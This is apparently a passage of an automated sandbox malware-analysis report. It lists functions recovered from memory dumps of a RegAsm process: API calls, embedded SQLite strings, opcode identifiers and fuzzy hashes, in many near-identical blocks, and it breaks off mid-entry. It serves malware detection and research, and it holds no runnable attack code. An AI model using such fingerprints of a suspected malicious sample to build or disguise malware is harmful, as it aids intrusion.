                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: second argument to nth_value must be a positive integer
                                                                                                                                                                                                • API String ID: 0-2620530100
                                                                                                                                                                                                • Opcode ID: a62466d241008b5ee2b1822ab2880d3aff758ba8123644f38b9340288f37f980
                                                                                                                                                                                                • Instruction ID: e87cbb44719fcdbee3ce07928388a09cfeb2df40a82ddfe0b263c02237081131
                                                                                                                                                                                                • Opcode Fuzzy Hash: a62466d241008b5ee2b1822ab2880d3aff758ba8123644f38b9340288f37f980
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71313F76D003129BDF10BF24FC427DA7BA4BF48711F04C659EC95A6250F722FD548692
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D5280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4D52FC
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D5301
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D52F2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 48f6f74a4d2aef432c5279a2668e49b4036353f1499a8661a6cba69d863b6cbb
                                                                                                                                                                                                • Instruction ID: 751604201620158990d96f3aa47c3e20d274100bfe17a813af9eda4e0c8681f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 48f6f74a4d2aef432c5279a2668e49b4036353f1499a8661a6cba69d863b6cbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD11547B70020067CF105B59FC41CDBBFA5DFC52B2F094565FA4856222E722E92197F2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EEA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0040EECB
                                                                                                                                                                                                • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EEF6
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EF3C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorInformationLastLogicalProcessorwsprintf
                                                                                                                                                                                                • String ID: DUB
                                                                                                                                                                                                • API String ID: 4210301552-3620500899
                                                                                                                                                                                                • Opcode ID: 5972859eec071abbba46104b99739d47d3a8578b111994b832e41ceae0e04b5f
                                                                                                                                                                                                • Instruction ID: 741c8af5bfff6a8fdddd2decec33d16abe5f3a752fb6206f2dd4af5b1af627c4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5972859eec071abbba46104b99739d47d3a8578b111994b832e41ceae0e04b5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64214472E0011AFFCB209F96E8804AEB7B9EB44704B5444BFE105F2281DB384E559E99
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4DFD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4DFE7D
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4DFE82
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4DFDE6, 1B4DFE61
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 3a2b446b268c747bcdcf77295fc8f915afb099dff3545264a742d39d033535b7
                                                                                                                                                                                                • Instruction ID: 6e566dda6bdeac9aeefe78fc1a8132a31e3c915f832103471dde7cc1033dd043
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2b446b268c747bcdcf77295fc8f915afb099dff3545264a742d39d033535b7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F311CA85143818AD3249F24C4143A2BB61BF25749FA4C5CDE4898F753E37BC4C7DBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4ED6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s%s
                                                                                                                                                                                                • API String ID: 0-3252725368
                                                                                                                                                                                                • Opcode ID: d79e4c29c31064142a0eed524e1b596a89c489a83c84814bc1c21f4be079ce75
                                                                                                                                                                                                • Instruction ID: 23704560fe183b74713403e8909d2c0b0c2db54284c5e6792c7e5431f42ad383
                                                                                                                                                                                                • Opcode Fuzzy Hash: d79e4c29c31064142a0eed524e1b596a89c489a83c84814bc1c21f4be079ce75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78117F7A9002219BDB015F69DC88B9A37ACFFD026AF04452DEDD8E6204D739D958C7B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B6140 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: WITHOUT ROWID$CREATE TABLE %Q.'%q_%q'(%s)%s$fts5: error creating shadow table %q_%s: %s
                                                                                                                                                                                                • API String ID: 0-1971204597
                                                                                                                                                                                                • Opcode ID: 9f67dbcce53cabc786fef50f1f472ab2bd80edf0c31663d8aaebfb4549811af8
                                                                                                                                                                                                • Instruction ID: 2975bb3a717f19ec2858660b689310766a4bb83b82802d371bb8804d869186e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f67dbcce53cabc786fef50f1f472ab2bd80edf0c31663d8aaebfb4549811af8
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1119071600111AFEB054F68DD88AAABBB9FBD425AF04452CFD89D6101D731C858DBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A2380 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A2406
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A240B
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A23FC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 50bd7c0e2729e4750af3798a9a344ccf2a2643d64478c9f84da9715db7a4c6e9
                                                                                                                                                                                                • Instruction ID: 0745cf68d33fe4447346b566fbcfb534ff86791a1350c2677f507cc55dfce6ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 50bd7c0e2729e4750af3798a9a344ccf2a2643d64478c9f84da9715db7a4c6e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 88116A752042129FD718DF28DC80E9ABBA4BFA9304F51849CE5469B392D731E886DB90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B541F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • JSON path error near '%q', xrefs: 1B541F92
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: JSON path error near '%q'
                                                                                                                                                                                                • API String ID: 0-481711382
                                                                                                                                                                                                • Opcode ID: 17ae739514cbd295309a7757e9541cfcb5fbe7ff625762630ee159fbcc5d1177
                                                                                                                                                                                                • Instruction ID: c8ce1d5d1bc728486c6ee857ae0311d689373697473700ffcb1285390791b1c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 17ae739514cbd295309a7757e9541cfcb5fbe7ff625762630ee159fbcc5d1177
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C0104B27092517EEB209B549C01BDB7FD4DF81330F20462CF995962D4EB71A80293A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A1DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A1E59
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A1E63
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A1E53
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 312aafddc11906cb73772f3ad06ea337a13c0d1cf8cec54f1d7599822b415565
                                                                                                                                                                                                • Instruction ID: aefe3f83b7944b50cb090b65683f7505255b1798cd41c35cbcb87624ecfd3d46
                                                                                                                                                                                                • Opcode Fuzzy Hash: 312aafddc11906cb73772f3ad06ea337a13c0d1cf8cec54f1d7599822b415565
                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11E374708550AFD718DF3AD844AD7BBB8AF77A95F048458E046CB322C335E946C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BF0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B4BF105
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                • API String ID: 0-2312637080
                                                                                                                                                                                                • Opcode ID: c9256acf03246297987d00e1213585bbec16792947a095f4731d95834f702191
                                                                                                                                                                                                • Instruction ID: 3c68d6e88d04a30e58e3a5ae7c698245a52bc600d237487125563e14aa4a3b39
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9256acf03246297987d00e1213585bbec16792947a095f4731d95834f702191
                                                                                                                                                                                                • Instruction Fuzzy Hash: 910192367042415ED721976EFC40FE7BBE8EBC8621F05486EF6ADC2201D361AC859371
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C0D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B4C0D87
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                • API String ID: 0-2312637080
                                                                                                                                                                                                • Opcode ID: 238cbf095fcc3c7ee35542c7d4f63334d10de8149436c487bf6cf6afa710a7b9
                                                                                                                                                                                                • Instruction ID: 3e319634e219efef1d268061b22d2bacc46f76b7f84aa34c666d67bc94e3d04d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 238cbf095fcc3c7ee35542c7d4f63334d10de8149436c487bf6cf6afa710a7b9
